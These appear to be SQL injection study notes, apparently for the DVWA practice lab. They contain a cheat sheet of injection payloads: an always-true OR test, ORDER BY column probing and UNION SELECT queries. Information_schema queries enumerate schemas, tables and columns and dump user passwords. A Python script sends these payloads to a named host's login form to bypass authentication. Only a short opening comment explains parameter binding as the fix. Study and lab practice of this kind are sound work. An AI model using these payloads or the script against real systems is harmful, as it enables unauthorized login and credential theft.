-- Baseline reads of the users table: all columns, then two named columns.
select * from users;
select idx,id_param from users;
-- The two lines below show query text after a submitted value has been
-- concatenated into the id_param literal; both stop before the closing quote
-- (presumably appended by the application). The first carries the value admin.
-- The second carries 1' or '1'='1: the quote inside the value ends the literal
-- early and appends an OR test that is always true, so the WHERE clause no
-- longer filters rows. Passing the value as a bound parameter instead of
-- concatenating it keeps the whole input a single literal.
select id_param from users where id_param='admin
select id_param from users where id_param='1' or '1'='1
admin > 1' or '1'='1
Insert, Update, Delete
insert into ...
update ... set ...
delete from ...
Common SQL Injection Payloads
1' or '1'='1
1' ORDER BY 1#
1' ORDER BY 2#
1' ORDER BY 3# (X)
1' UNION SELECT name,pw from users#
1' UNION SELECT 1,2#
1' UNION SELECT 1,2,3# (X)
Information Schema Queries
'UNION SELECT schema_name,2 from information_schema.schemata#
'UNION SELECT table_name,2 from information_schema.tables where table_schema='dvwa'#
'UNION SELECT column_name,2 from information_schema.columns where table_schema='dvwa' and table_name='users'#
'UNION SELECT user,password from users#
Ports Commonly Used in Web Attacks
21 (FTP), 22 (SSH), 23 (Telnet), 25 (SMTP), 110 (POP3), 143 (IMAP), 3306 (MySQL)
80 (HTTP), 443 (HTTPS)
Automation Code Example
Python Script for SQL Injection
import requests
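def sql(self):
    """Post each test string to the lab login form and print the reply.

    Every entry of the list is sent as both ``id_param`` and ``pw_param`` in a
    form-encoded POST. The entry and the response body are printed, and
    "SQL OK" is printed when the body is exactly "OK".

    Args:
        self: Unused; kept so existing callers keep working.

    Returns:
        None. All output goes to stdout.

    Raises:
        requests.exceptions.RequestException: If a request fails or exceeds
            the timeout.
    """
    target = "http://web2.st.kr/auth/login2_ok.php"
    # The last three entries are empty placeholders in the original notes.
    test_inputs = [
        "1' or '1'='1",
        "' UNION SELECT schema_name,2 from information_schema.schemata#",
        "",
        "",
        "",
    ]
    # The loop variable is not called `sql`, so it no longer shadows the function name.
    for value in test_inputs:
        payload = {"id_param": value, "pw_param": value}
        print(value)
        # Bounded wait so an unresponsive server cannot hang the run.
        response = requests.post(target, data=payload, timeout=10)
        print(response.text)
        # NOTE(review): presumably the endpoint answers "OK" when the login is
        # accepted -- confirm against the server. A handler that binds both
        # fields as query parameters should never return it for these inputs.
        if response.text == "OK":
            print("SQL OK")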